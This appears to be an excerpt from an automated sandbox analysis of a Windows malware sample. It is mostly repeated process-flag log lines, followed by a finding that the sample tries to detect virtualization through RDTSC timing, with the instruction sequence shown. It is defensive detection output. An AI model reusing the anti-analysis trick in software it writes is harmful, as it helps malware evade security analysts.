Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WWAHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Uolmxh0\5jd0x8e0uzsd8l.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurementsShow sources
Source: C:\Users\user\Desktop\ACre0O2rKa.exeRDTSC instruction interceptor: First address: 0000000000407244 second address: 000000000040724A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ACre0O2rKa.exeRDTSC instruction interceptor: First address: 00000000004074AE second address: 00000000004074B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc